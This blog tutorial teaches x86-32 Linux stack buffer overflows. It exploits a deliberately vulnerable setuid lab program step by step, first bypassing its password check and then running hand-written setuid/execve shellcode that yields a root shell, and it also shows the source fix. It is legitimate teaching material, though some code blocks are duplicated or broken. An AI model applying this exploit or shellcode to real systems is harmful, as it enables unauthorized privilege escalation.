Plain Buffer Overflow [Fully Explained]

17:29


This is the start of a series of tutorials exploring how to detect and exploit stackbased vulnerabilities on x86-32 Linux systems. As this is the first it will involve detecting and exploiting a buffer overflow on a system with no protections in place. Modern protections will be explored in future tutorials but its important to understand the basics before trying to take on the more complex situations.
A buffer overflow happens when a programmer has not done sufficient bounds checking while or before copying the contents of one buffer into another. A buffer is normally a variable array (stack) or memory allocated using a dynamic memory allocation function (heap). We will be concentrating on stack based (variable array) buffer overflows at first as they are much easier to understand for beginners.
All of the code in this tutorial was written by the author.

The Vulnerable App: 

Below is the source code of the vulnerable application that we will be attacking. It is written in C.
#include <stdio.h> #include <string.h> #include <stdlib.h> #define PASS "topsecretpassword" #define SFILE "secret.txt" int checkpass(char *p); void printfile(); int main(int argc, char **argv) { int r; if (argc < 2) { printf("Usage: "); printf(argv[0]); printf(" <password>\n"); exit(1); } r = checkpass(argv[1]); if (r != 0) { printf("Wrong password: "); printf(argv[1]); printf("\n"); exit(1); } printfile(); } int checkpass(char *a) { char p[512]; int r; strncpy(p, a, strlen(a)+1); r = strcmp(p, PASS); return r; } void printfile() { FILE *f; int c; f = fopen(SFILE, "r"); if (f) { while ((c = getc(f)) != EOF) putchar(c); fclose(f); } else { printf("Error opening file: " SFILE "\n"); exit(1); } }

The Fix:

The code in the above application that is vulnerable to a stack based buffer overflow is on line 36 (strncpy(p, a, strlen(a)+1);). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer p as strlen(a)+1, this calculation is in fact based on the length of the input provided by the user and is controled by the user. To fix this vulnerability, this line should be changed to strncpy(p, a, sizeof(p)-1); or strncpy(p, a, 511);, we minus the 1 byte to leave space for the terminating null character ‘\0’. For more information about strncpy see man strncpy.

Setting Up The Environment:

This is how to setup the environment in full on a Debian based system:

root@dev:~# adduser testuser Adding user `testuser' ... Adding new group `testuser' (1001) ... Adding new user `testuser' (1001) with group `testuser' ... Creating home directory `/home/testuser' ... Copying files from `/etc/skel' ... Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully Changing the user information for testuser Enter the new value, or press ENTER for the default Full Name []: Room Number []: Work Phone []: Home Phone []: Other []: Is the information correct? [Y/n] root@dev:~# ls app.c root@dev:~# gcc -z execstack -fno-stack-protector -o app app.c root@dev:~# cp app /home/testuser/ root@dev:~# cat /proc/sys/kernel/randomize_va_space 2 root@dev:~# echo 0 > /proc/sys/kernel/randomize_va_space root@dev:~# cat /proc/sys/kernel/randomize_va_space 0 root@dev:~# cd /home/testuser/ root@dev:/home/testuser# ls -l app -rwxr-xr-x 1 root root 6242 Apr 17 16:48 app root@dev:/home/testuser# chmod u+s app root@dev:/home/testuser# ls -l app -rwsr-xr-x 1 root root 6242 Apr 17 16:48 app root@dev:/home/testuser# echo 'This is a top secret file! > Only people with the password should be able to view this file!' > secret.txt root@dev:/home/testuser# ls -l secret.txt -rw-r--r-- 1 root root 91 May 9 13:40 secret.txt root@dev:/home/testuser# chmod 600 secret.txt root@dev:/home/testuser# ls -l secret.txt -rw------- 1 root root 91 May 9 13:40 secret.txt root@dev:/home/testuser# cat secret.txt This is a top secret file! Only people with the password should be able to view this file! root@dev:/home/testuser# su - testuser testuser@dev:~$ ls -l app -rwsr-xr-x 1 root root 6242 Apr 17 16:48 app testuser@dev:~$ ls -l secret.txt -rw------- 1 root root 91 May 9 13:40 secret.txt testuser@dev:~$ cat secret.txt cat: secret.txt: Permission denied
So our environment is setup and ready for exploit development. Firstly a testuser is added to run the application as, then on line 20 the application is compiled with stack protections removed. On line 24 ASLR is disabled and on line 30 the application has the setuid bit set so that when run the application can run with root privileges (which is required to read the file created on lines 33 and 34). Lastly confirmation that the file is not readable by the user that runs the application is on lines 48 and 49.

Testing App and Finding Vulnerability:

First we need to use the application to figure out its inputs and see how the application acts normally:

testuser@dev:~$ ./app Usage: ./app <password> testuser@dev:~$ ./app test Wrong password: test testuser@dev:~$ echo $? 1

As we can see, when we enter the wrong password the applications exit code is 1, let’s try fuzzing this input to look for a buffer overflow, here is a simple python script that can do that:

#!/usr/bin/env python import os from subprocess import Popen, PIPE count=0 # store the number when we cause a crash for i in range(5000): # loop through the numbers from 0 to 5000 # and use i as the incrementor # execute the file ./app with the argument "A"*i so we keep # increasing the number of A's by 1 process = Popen(["./app", "A"*i], stdin=PIPE, stdout=PIPE) (output, err) = process.communicate() exit_code = process.wait() # wait for the programs exit code if exit_code != 1: # if its not = 1 count = i # set the count to i break # and break out of the loop print count # print the number of A's it took to crash it

Running the python script gives us:


testuser@dev:~$ python app-fuzz.py 524

Exploiting The App:

So the python script crashed the application by inserting 524 A’s as its input. Just because we crashed the application it doesn’t mean we took control of the applications execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A’s is 524 bytes).
We will use gdb to do this. The hex for A is 41, you can figure this out using the ascii man page (man ascii), so what we are looking for is when the application crashes it should be trying to run 41414141 (as this is a 32 bit system, each instruction is 32 bits long or 4 bytes).
testuser@dev:~$ gdb -q ./app Reading symbols from /home/testuser/app...(no debugging symbols found)...done. (gdb) r $(python -c 'print "A" * 524') Starting program: /home/testuser/app $(python -c 'print "A" * 524') Program received signal SIGSEGV, Segmentation fault. 0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6 (gdb) r $(python -c 'print "A" * 528') The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/testuser/app $(python -c 'print "A" * 528') Program received signal SIGSEGV, Segmentation fault. 0xbffff970 in ?? () (gdb) r $(python -c 'print "A" * 532') The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/testuser/app $(python -c 'print "A" * 532') Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()

We increase the number of bytes by 4 each time because we are on a 32 bit system. So 528 bytes and then we hijack execution, you can see this as when the application crashes the instruction that the application is trying to run is 0x41414141 (on line 21) which is just AAAA.
I’m going to show you 2 ways you can exploit this, the first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check, again we’ll use gdb for this:





testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     and    esp,0xfffffff0
   0x08048612 <+6>:     sub    esp,0x20
   0x08048615 <+9>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048619 <+13>:    jg     0x804864c <main+64>
   0x0804861b <+15>:    mov    DWORD PTR [esp],0x80487f0
   0x08048622 <+22>:    call   0x8048470 <printf@plt>
   0x08048627 <+27>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804862a <+30>:    mov    eax,DWORD PTR [eax]
   0x0804862c <+32>:    mov    DWORD PTR [esp],eax
   0x0804862f <+35>:    call   0x8048470 <printf@plt>
   0x08048634 <+40>:    mov    DWORD PTR [esp],0x80487f8
   0x0804863b <+47>:    call   0x80484a0 <puts@plt>
   0x08048640 <+52>:    mov    DWORD PTR [esp],0x1
   0x08048647 <+59>:    call   0x80484c0 <exit@plt>
   0x0804864c <+64>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804864f <+67>:    add    eax,0x4
   0x08048652 <+70>:    mov    eax,DWORD PTR [eax]
   0x08048654 <+72>:    mov    DWORD PTR [esp],eax
   0x08048657 <+75>:    call   0x80486a2 <checkpass>
   0x0804865c <+80>:    mov    DWORD PTR [esp+0x1c],eax
   0x08048660 <+84>:    cmp    DWORD PTR [esp+0x1c],0x0
   0x08048665 <+89>:    je     0x804869b <main+143>
   0x08048667 <+91>:    mov    DWORD PTR [esp],0x8048804
   0x0804866e <+98>:    call   0x8048470 <printf@plt>
   0x08048673 <+103>:   mov    eax,DWORD PTR [ebp+0xc]
   0x08048676 <+106>:   add    eax,0x4
   0x08048679 <+109>:   mov    eax,DWORD PTR [eax]
   0x0804867b <+111>:   mov    DWORD PTR [esp],eax
   0x0804867e <+114>:   call   0x8048470 <printf@plt>
   0x08048683 <+119>:   mov    DWORD PTR [esp],0xa
   0x0804868a <+126>:   call   0x8048500 <putchar@plt>
   0x0804868f <+131>:   mov    DWORD PTR [esp],0x1
   0x08048696 <+138>:   call   0x80484c0 <exit@plt>
   0x0804869b <+143>:   call   0x80486f0 <printfile>
   0x080486a0 <+148>:   leave  
   0x080486a1 <+149>:   ret    
End of assembler dump.


















0x0804861b <+15>: mov DWORD PTR [esp],0x80487f0 0x08048622 <+22>: call 0x8048470 0x08048627 <+27>: mov eax,DWORD PTR [ebp+0xc] 0x0804862a <+30>: mov eax,DWORD PTR [eax] 0x0804862c <+32>: mov DWORD PTR [esp],eax 0x0804862f <+35>: call 0x8048470 0x08048634 <+40>: mov DWORD PTR [esp],0x80487f8 0x0804863b <+47>: call 0x80484a0 0x08048640 <+52>: mov DWORD PTR [esp],0x1 0x08048647 <+59>: call 0x80484c0 0x0804864c <+64>: mov eax,DWORD PTR [ebp+0xc] 0x0804864f <+67>: add eax,0x4 0x08048652 <+70>: mov eax,DWORD PTR [eax] 0x08048654 <+72>: mov DWORD PTR [esp],eax 0x08048657 <+75>: call 0x80486a2 0x0804865c <+80>: mov DWORD PTR [esp+0x1c],eax 0x08048660 <+84>: cmp DWORD PTR [esp+0x1c],0x0 0x08048665 <+89>: je 0x804869b
0x08048667 <+91>: mov DWORD PTR [esp],0x8048804 0x0804866e <+98>: call 0x8048470 0x08048673 <+103>: mov eax,DWORD PTR [ebp+0xc] 0x08048676 <+106>: add eax,0x4 0x08048679 <+109>: mov eax,DWORD PTR [eax] 0x0804867b <+111>: mov DWORD PTR [esp],eax 0x0804867e <+114>: call 0x8048470 0x08048683 <+119>: mov DWORD PTR [esp],0xa 0x0804868a <+126>: call 0x8048500 0x0804868f <+131>: mov DWORD PTR [esp],0x1 0x08048696 <+138>: call 0x80484c0 0x0804869b <+143>: call 0x80486f0 0x080486a0 <+148>: leave 0x080486a1 <+149>: ret End of assembler dump.

I use the -q option to gdb to supress the informational message that it normally splits out on started, I then set the disassembly flavor to intel format because gdb defaults to AT&T format and I prefer intel.
The call to printfile on line 41 looks like a good choice to jump to and as we can see it is at address 0x0804869b. All we need to do is put this address in, in reverse due to little endian, after 528 bytes, heres how:
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x9b\x86\x04\x08"') This is a top secret file! Only people with the password should be able to view this file! Segmentation fault

We still get a segmentation fault but it outputs the contents of the file meaning we’ve circumvented the password protection.

Developing Shellcode/ Improving Exploitation:

Now I’m going to show you how to use this to run your own code as root. First we need some code to run. I’ve written a quick assembly application in IA32 format which just runs the execve system callwith /bin/bash as its argument (for more information on execve itself see man execve):



; run /bin/bash global _start section .text _start: jmp short Call_shellcode ; jump to where our string is shellcode: pop ebx ; pop the address of our string into ebx ; which is the first argument to execve xor eax, eax ; zero out the eax register mov [ebx +9], al ; put a 0 where the A is to null ; terminate the /bin/bash string mov al, 0xb ; put the sys call number 11 into eax mov [ebx +10], ebx ; put a pointer to the beginning ; of the string where the BBBB is xor ecx, ecx ; zero out the ecx register mov [ebx +14], ecx ; replace the CCCC with 0000 lea ecx, [ebx +10] ; load the address that used to ; point to BBBB into ecx the second ; argument to execve lea edx, [ebx +14] ; load the address that used to ; point to CCCC into edx the third ; argument to execve int 0x80 ; execute the syscall execve Call_shellcode: call shellcode ; call the start of the actual application shell: db "/bin/bashABBBBCCCC" ; our string of ; arguments to execve

A system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx, edx registers respectively; and then running int 0x80 to execute the system call. To find the sys call number do this:

testuser@dev:~$ grep execve /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_execve 11

This means execve is 11 or 0xb in hex.
In this shellcode I’m using the jmp-call-pop technique to get the address of the string and the list of arguments (When you do a call instruction, the address of the next instruction is pushed onto the stack), this makes the code position independent. So we now need to extract this shellcode:
testuser@dev:~$ nasm -f elf32 -o shell.o shell.nasm testuser@dev:~$ ld -o shell shell.o testuser@dev:~$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43" x43\x43\x43\x43"

We have shellcode now but we should test it to make sure it works, the following C application can do that:

#include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b" "\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e" "\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f" \x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret();  }\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }

I’ve split it up onto multiple lines here for readability. Compiling it and running it:


testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c testuser@dev:~$ ./shellcode Shellcode Length: 49 testuser@dev:/home/testuser$

It worked, the application shellcode just sets the return value of the main function to the address of the beginning of our shellcode which run’s it because you can’t just run it manually:

testuser@dev:~$ ./shell Segmentation fault

Now we need to figure out a way to put our shellcode in memory and find its address to hijack execution of our vulnerable application with. We can put it in an environment varable and use getenvto get its address, here is how we put it into an environment variable:

testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')

Here is another C application that we can use to get the address of an environment variable in the memory of another application:

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC #include <stdio.h>
#include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char *ptr; if(argc < 3) { printf("Usage: %s <environment variable> <target program name>\n", argv[0]); exit(0); } ptr = getenv(argv[1]); /* get env var location */ ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */ printf("%s will be at %p\n", argv[1], ptr); }

We compile this application and run it with the relevent arguments:

testuser@dev:~$ gcc -o getenvaddr getenvaddr.c testuser@dev:~$ ./getenvaddr SHELLCODE ./app SHELLCODE will be at 0xbffff774

Great! Nearly there, we’ve got the address of our shellcode now to use it. We will hijack the execution flow as we did before but this time we will point to the address of our environment variable:

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x74\xf7\xff\xbf"')
bash-4.2$ whoami testuser bash-4.2$ cat secret.txt cat: secret.txt: Permission denied

Damn! So it didn’t work. It must be dropping privileges, no need to worry, but we now to to change our shellcode to run the setuid system call before executing execve and set the uid to 0 (or root) (for more information on setuid see man setuid). First we need to find out the sys call number:


testuser@dev:~$ grep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_setuid 23 #define __NR_setuid32 213

The sys call number is 23 or 0x17 in hex, our modified shellcode is:

; run /bin/bash global _start section .text _start: jmp short Call_shellcode ; jump to where our string is shellcode: xor eax, eax ; zero out eax mov al, 0x17 ; put 23 into eax to setuid xor ebx, ebx ; zero out ebx int 0x80 ; make the syscall setuid mov eax, ebx ; zero out eax pop ebx ; pop the address of our string into ebx ; which is the first argument to execve mov [ebx +9], al ; put a 0 where the A is to null ; terminate the /bin/bash string mov al, 0xb ; put the sys call number 11 into eax mov [ebx +10], ebx ; put a pointer to the beginning ; of the string where the BBBB is xor ecx, ecx ; zero out the ecx register mov [ebx +14], ecx ; replace the CCCC with 0000 lea ecx, [ebx +10] ; load the address that used to ; point to BBBB into ecx the second ; argument to execve lea edx, [ebx +14] ; load the address that used to ; point to CCCC into edx the third ; argument to execve int 0x80 ; execute the syscall execve Call_shellcode: call shellcode ; call the start of the actual application shell: db "/bin/bashABBBBCCCC" ; our string of ; arguments to execve

This is the same as before except I added a call to setuid before it starts setting up the call to execve. Let’s first make sure it works:

testuser@dev:~$ nasm -f elf32 -o shell2.o shell2.nasm testuser@dev:~$ ld -o shell2 shell2.o testuser@dev:~$ objdump -d ./shell2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43" testuser@dev:~$ cat shellcode.c #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c testuser@dev:~$ ./shellcode Shellcode Length: 57 testuser@dev:/home/testuser$

That seems to work, let’s test it out:


testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"') testuser@dev:~$ ./getenvaddr SHELLCODE ./app SHELLCODE will be at 0xbffff76c testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x6c\xf7\xff\xbf"') root@dev:/home/testuser# whoami root root@dev:/home/testuser# cat secret.txt This is a top secret file! Only people with the password should be able to view this file!

PWNED!!! :-D


Conclusion: 

t’s very important to understand that when you are developing exploits you are always going to run into problems, that is why I left the bit in here where I did n’t get root access. You will fail over and over again but if you continue trying you will find a way to hack it in the end.
This was one of the simplest examples possible but before continuing it is important that you are able to do this. Don’t worry if you don’t understand how the application execution was hijacked or how the stack works, I will explain all of that in later tutorials when it is absolutely necessary, this tutorial is already long enough without going into more depth.
I hope you enjoyed reading this as much as I enjoyed writing it.
Happy Hacking :–)

You Might Also Like

0 comments

Popular Posts

Like us on Facebook

Flickr Images